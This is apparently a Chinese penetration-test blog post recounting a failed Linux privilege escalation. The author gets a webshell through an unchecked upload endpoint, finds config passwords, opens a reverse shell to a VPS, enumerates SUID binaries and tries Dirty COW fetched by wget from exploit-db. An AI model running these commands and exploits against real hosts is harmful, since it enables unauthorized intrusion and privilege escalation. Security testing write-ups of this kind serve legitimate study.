一次工作中getshell失败的linux提权尝试
先检查了源代码,发现上传代码根本没有判断用户的上传类型
发现ajax采用json数据传递data参数的时候,只要有数据,即可保存成功
而且这个漏洞可能是通用
意味着我们可以上传任何格式类型的脚本木马,如.php.jsp.php4.php5.aspx cer,关键点在于能否成功解析木马
拿shell的过程就省略..
我们可以去找找配置文件的数据 linux主机
如conf,config之类的
找了许久发现了数据连接密码,用find命令查找,find /opt -name "config.*"
最后我们来简单对linux的pwd提个权尝试
试想密码可能那个通用帐号的密码
结果失望了,权限被拒绝
换一种思路
看来想多了
转变思路
发现被拒绝
我们发现在哥斯拉这个CMD下,貌似利用点很少,我们需要进行反弹到VPS公网进行交互性执行shell
MariaDB是mysql的一个分支,但是居然大马不支持mysql执行
那么我们直接使用反弹吧
VPS使用:yum install -y nc
安装NC工具,然后填写公网IP,选择perl连接
VPS监听12388端口,然后执行反弹
反弹成功
现在我们
试试suid提权
公网VPS执行
find / -perm -u=s -type f 2>/dev/null
找一个查看是否以ROOT权限运行
Ls -lh /usr/bin/sudo Ls -lh /usr/bin/find
然后我们使用-exec执行,发现还是nginx,并不是root
证明提权失败
直接试试bash -p,也不行
我们使用Linux_Exploit_Suggester试试
上传e.sh到网站目录,然后chmod +x 文件名赋予执行权限
接着./e.sh自动查找可提权的脚本
发现存在脏牛提权漏洞?只是有可能性
脏牛提权的版本,但是感觉可能性不大
Centos7 /RHEL7 3.10.0-327.36.3.el7Cetnos6/RHEL6 2.6.32-642.6.2.el6Ubuntu 16.10 4.8.0-26.28Ubuntu 16.04 4.4.0-45.66Ubuntu 14.04 3.13.0-100.147Debian 8 3.16.36-1+deb8u2Debian 7
wget下载脚本
wget https://www.exploit-db.com/download/40611
然后查看
出错
有安装 gcc 或者 g++,也可能是已安装的 gcc 和 g++ 版本不兼容
那么VPS自行编译下,新建一个shell.c,vim插入数据
然后把shell上传到目标服务器tmp目录下,不然没法传
现在需要做的就是VPS开启http服务
用python3开启http服务
安装python3.7版本
下载文件
传到tmp目录下执行./shell
使用chmod 777 +赋予权限
VPS模拟测试脏牛提权:
成功提权,然后利用.bak备份文件恢复了原始的etc/passwd
在目标服务器测试却出现了问题
一系列问题接踵而至
网上也没找到好的解决办法
两个版本的脏牛都失败了
PIE_stack_corruption是内存破坏漏洞,
[CVE-2017-1000253] PIE_stack_corruption
Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
Exposure: probable
Tags: RHEL=6,[ RHEL=7 ]{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c
这个就先不弄
无奈
使用打开kali
搜了一下也没有找到好的提权版本,这台主机的版本升级后有点高
试想一下,系统如果被轻易linux提权后果更难以想象
至少保证了服务器没有被提权
只是单纯的web层存在漏洞,这样一来,核心层还是确保了真正的“安全”
提权尝试结束,就写到这里...
